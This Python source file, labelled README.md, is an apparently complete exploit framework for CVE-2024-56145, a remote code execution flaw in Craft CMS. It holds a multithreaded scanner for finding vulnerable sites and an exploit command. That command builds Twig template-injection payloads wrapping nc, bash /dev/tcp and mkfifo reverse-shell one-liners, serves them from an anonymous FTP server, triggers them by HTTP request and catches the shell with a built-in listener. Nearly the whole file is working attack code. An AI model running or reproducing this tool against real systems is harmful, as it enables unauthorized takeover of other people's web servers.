README.md
Rendering markdown...
import os
import sys
import uuid
import select
import socket
import warnings
import requests
import threading
import rich_click as click
from rich.console import Console
from alive_progress import alive_bar
from pyftpdlib.servers import FTPServer
from pyftpdlib.handlers import FTPHandler
from pyftpdlib.authorizers import DummyAuthorizer
from concurrent.futures import ThreadPoolExecutor
# Shared Rich console used for all status output in this file.
console = Console()
# Silence urllib3 warnings; the HTTP requests in this file are sent with
# verify=False.
requests.packages.urllib3.disable_warnings()
# Ignore RuntimeWarning messages originating from pyftpdlib.authorizers.
warnings.filterwarnings(
    "ignore", category=RuntimeWarning, module="pyftpdlib.authorizers"
)
# Root command group. The docstring below is what click renders as the
# top-level --help text, so its wording is kept exactly as written.
@click.group(context_settings={"help_option_names": ["-h", "--help"]})
def cli():
    """
    CVE-2024-56145 Exploit Framework
    Exploits a Remote Code Execution (RCE) vulnerability in Craft CMS.
    Thanks to Assetnote for their research and findings:
    https://www.assetnote.io/resources/research/how-an-obscure-php-footgun-led-to-rce-in-craft-cms
    This tool provides commands to:
    - Check if a target is vulnerable.
    - Exploit the vulnerability using a crafted FTP server and listener.
    """
# `check` sub-command: run check_target() over a single URL and/or every
# non-blank line of a URL file, using a thread pool, and optionally append one
# result line per target to an output file.
#
# Documented with comments rather than a docstring on purpose: click would
# surface a docstring as this command's --help description.
@cli.command()
@click.option("-u", "--url", required=False, help="The target URL for checking")
@click.option(
    "-f",
    "--file",
    required=False,
    type=click.Path(exists=True),
    help="File containing a list of URLs",
)
@click.option(
    "-t", "--threads", default=50, type=int, help="Number of concurrent threads"
)
@click.option(
    "-o",
    "--output",
    required=False,
    type=click.Path(),
    help="Output file to save results",
)
def check(url, file, threads, output):
    if not (url or file):
        console.print(
            "[bold red]You must specify either a URL or a file containing URLs.[/bold red]"
        )
        return

    targets = [url] if url else []
    if file:
        # Context manager so the URL list's file handle is always closed.
        with open(file, "r") as url_file:
            targets.extend(line.strip() for line in url_file if line.strip())

    # Only open an output file when one was requested; workers test for None
    # instead of calling a missing writer.
    out_file = open(output, "a") if output else None
    lock = threading.Lock()
    try:
        with alive_bar(
            len(targets), title="Checking Targets", bar="smooth", enrich_print=False
        ) as bar:

            def process_target(target):
                result = check_target(target)
                # One lock serialises both the file write and the progress
                # tick, which now happens after the target was processed.
                with lock:
                    if out_file is not None:
                        out_file.write(f"{result}\n")
                    bar()

            with ThreadPoolExecutor(max_workers=threads) as executor:
                # Executor.map only re-raises worker exceptions when its
                # results are iterated, so drain it instead of discarding it.
                list(executor.map(process_target, targets))
    finally:
        if out_file is not None:
            out_file.close()
def check_target(target):
    """Probe a single target and report the outcome.

    Sends a GET request to ``target`` with a ``--configPath`` query value made
    of a fresh UUID, then looks for both ``mkdir()`` and that UUID in the
    response body.

    Args:
        target: Base URL to probe.

    Returns:
        ``"<target> | VULNERABLE"``, ``"<target> | NOT VULNERABLE"`` or
        ``"<target> | ERROR"``. The same outcome is also printed to the
        console.
    """
    nonce = str(uuid.uuid4())
    probe_url = f"{target}?--configPath=/{nonce}"
    try:
        body = requests.get(probe_url, verify=False, timeout=2).text
        # Both markers must be present for a positive result.
        if "mkdir()" not in body or nonce not in body:
            console.print(f"[bold yellow]{target} is not vulnerable.[/bold yellow]")
            return f"{target} | NOT VULNERABLE"
        console.print(f"[bold green]{target} is vulnerable![/bold green]")
        return f"{target} | VULNERABLE"
    except Exception as e:
        console.print(f"[bold red]Failed to check {target}: {e}[/bold red]")
        return f"{target} | ERROR"
# `exploit` sub-command. Steps, in order:
#   1. build the payload string and write it into ./virtual,
#   2. start the FTP server and the listener, each in its own daemon thread,
#   3. send the triggering HTTP request from the calling thread.
# Both helper threads are daemons, so they do not keep the process alive once
# this function returns.
#
# Documented with comments rather than a docstring because click would show a
# docstring as this command's --help description.
@cli.command()
@click.option("-fh", "--ftp-host", default="127.0.0.1", help="The FTP server host")
@click.option("-fp", "--ftp-port", default=2121, type=int, help="The FTP server port")
@click.option("-u", "--url", required=True, help="The target URL for exploitation")
@click.option(
    "-lh", "--lhost", required=True, help="The local host for reverse shell listener"
)
@click.option(
    "-lp",
    "--lport",
    required=True,
    type=int,
    help="The local port for reverse shell listener",
)
@click.option(
    "-px",
    "--payload",
    default="bash",
    type=click.Choice(["nc", "bash", "mkfifo"]),
    help="Payload type to use",
)
def exploit(ftp_host, ftp_port, url, lhost, lport, payload):
    payload_str = generate_payload(payload, lhost, lport)
    root_dir = "./virtual"
    create_virtual_files(root_dir, payload_str)

    ftp_thread = threading.Thread(
        target=start_ftp_server,
        args=(ftp_host, ftp_port, root_dir),
        daemon=True,
    )
    ftp_thread.start()

    listener_thread = threading.Thread(
        target=start_listener,
        args=(lhost, lport),
        daemon=True,
    )
    listener_thread.start()

    console.print("[bold green]FTP server and listener started[/bold green]")
    trigger_http_request(url, ftp_host, ftp_port)
def generate_payload(payload_type, lhost, lport):
    """Build the template payload string for the selected payload type.

    Args:
        payload_type: One of ``"nc"``, ``"bash"`` or ``"mkfifo"``.
        lhost: Host interpolated into the command.
        lport: Port interpolated into the command.

    Returns:
        The payload string, which is also printed to the console.

    Raises:
        KeyError: If ``payload_type`` is not one of the known keys.
    """
    commands = {
        "nc": f"nc -e /bin/bash {lhost} {lport}",
        "bash": f'bash -c "bash -i >& /dev/tcp/{lhost}/{lport} 0>&1"',
        "mkfifo": f"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc {lhost} {lport} >/tmp/f",
    }
    command = commands[payload_type]
    # Quadrupled braces in the f-string emit literal "{{" and "}}".
    payload = f"{{{{ ['system', '{command}'] | sort('call_user_func') }}}}"
    console.print(f"[bold yellow]Payload generated:[/bold yellow] {payload}")
    return payload
def create_virtual_files(root_dir, payload):
    """Write the payload into ``index.twig`` and ``index.html``.

    Both files are created under ``<root_dir>/default``, which is created if
    missing. Any exception is reported on the console and not re-raised.

    Args:
        root_dir: Directory under which the ``default`` folder is created.
        payload: Text written verbatim to both files.
    """
    template_dir = f"{root_dir}/default"
    try:
        os.makedirs(template_dir, exist_ok=True)
        # Same content for both files, written in the same order as before.
        for file_name in ("index.twig", "index.html"):
            with open(f"{template_dir}/{file_name}", "w") as template_file:
                template_file.write(payload)
        console.print("[bold green]Virtual files created successfully.[/bold green]")
    except Exception as e:
        console.print(f"[bold red]Failed to create virtual files:[/bold red] {e}")
def start_ftp_server(host, port, root_dir):
    """Serve ``root_dir`` over FTP to anonymous users until the server stops.

    Args:
        host: Address the FTP server binds to.
        port: Port the FTP server binds to.
        root_dir: Directory exposed as the anonymous user's home.
    """
    anonymous_auth = DummyAuthorizer()
    anonymous_auth.add_anonymous(root_dir, perm="elradfmw")
    # The authorizer is set on the FTPHandler class itself, not on a copy.
    FTPHandler.authorizer = anonymous_auth
    ftp_server = FTPServer((host, port), FTPHandler)
    console.print(f"[bold green]FTP server running on {host}:{port}[bold green]")
    try:
        ftp_server.serve_forever()
    except Exception as e:
        console.print(f"[bold red]Error starting FTP server:[/bold red] {e}")
def trigger_http_request(url, ftp_host, ftp_port):
    """Send the GET request that points ``--templatesPath`` at the FTP server.

    The outcome (HTTP 200, any other status, or a request failure) is printed
    to the console; nothing is returned and no exception is re-raised.

    Args:
        url: Target URL the query string is appended to.
        ftp_host: Host used to build the ``ftp://`` templates path.
        ftp_port: Port used to build the ``ftp://`` templates path.
    """
    templates_path = f"ftp://{ftp_host}:{ftp_port}"
    console.print(
        f"[bold yellow]Sending request to {url} with templatesPath={templates_path}[bold yellow]"
    )
    request_url = f"{url}?--templatesPath={templates_path}"
    try:
        # No timeout is passed, so this call waits for the response.
        response = requests.get(request_url, verify=False)
        if response.status_code != 200:
            console.print(
                f"[bold red]Failed to trigger payload. HTTP Status:[/bold red] {response.status_code}"
            )
        else:
            console.print(
                "[bold green]Payload triggered successfully. Check your listener for a session.[/bold green]"
            )
    except Exception as e:
        console.print(f"[bold red]Failed to send HTTP request:[/bold red] {e}")
def start_listener(lhost, lport, timeout=30):
    """Accept one TCP connection and relay it to and from the terminal.

    Binds a listening socket on ``(lhost, lport)`` and waits up to ``timeout``
    seconds for a single connection. Once connected, data received from the
    peer is written to stdout and each line read from stdin is sent to the
    peer, until the peer closes the connection.

    Timeouts, KeyboardInterrupt and other exceptions are reported on the
    console and not re-raised. Both sockets are always closed on exit.

    Args:
        lhost: Address to bind the listener to.
        lport: Port to bind the listener to.
        timeout: Seconds to wait in ``accept()`` before giving up.
    """
    console.print(f"[bold cyan]Starting listener on {lhost}:{lport}[bold cyan]")
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    # Pre-bind the name so the cleanup in `finally` is safe even when
    # accept() times out or fails before a connection exists.
    conn = None
    try:
        # bind/listen live inside the try so a failure here is reported and
        # the listening socket is still closed.
        s.bind((lhost, lport))
        s.listen(1)
        s.settimeout(timeout)
        console.print(
            f"[bold yellow]Waiting for connection... (Timeout: {timeout}s)[/bold yellow]"
        )
        conn, addr = s.accept()
        console.print(
            f"[bold green]Connection received from {addr[0]}:{addr[1]}[bold green]"
        )
        conn.setblocking(0)
        while True:
            # Block until either the peer or the local stdin has data.
            ready, _, _ = select.select([conn, sys.stdin], [], [])
            if conn in ready:
                data = conn.recv(4096).decode(errors="ignore")
                if not data:
                    # Empty read means the peer closed the connection.
                    break
                sys.stdout.write(data)
                sys.stdout.flush()
            if sys.stdin in ready:
                command = sys.stdin.readline().strip()
                conn.sendall((command + "\n").encode())
    except socket.timeout:
        console.print(
            f"[bold red]No connection received within {timeout} seconds.[/bold red]"
        )
    except KeyboardInterrupt:
        console.print("[bold cyan]\nListener stopped by user.[/bold cyan]")
    except Exception as e:
        console.print(f"[bold red]Error: {e}[bold red]")
    finally:
        if conn is not None:
            conn.close()
        s.close()
        console.print("[bold cyan]Listener closed.[/bold cyan]")
# Invoke the click command group only when this file is run as a script.
if __name__ == "__main__":
    cli()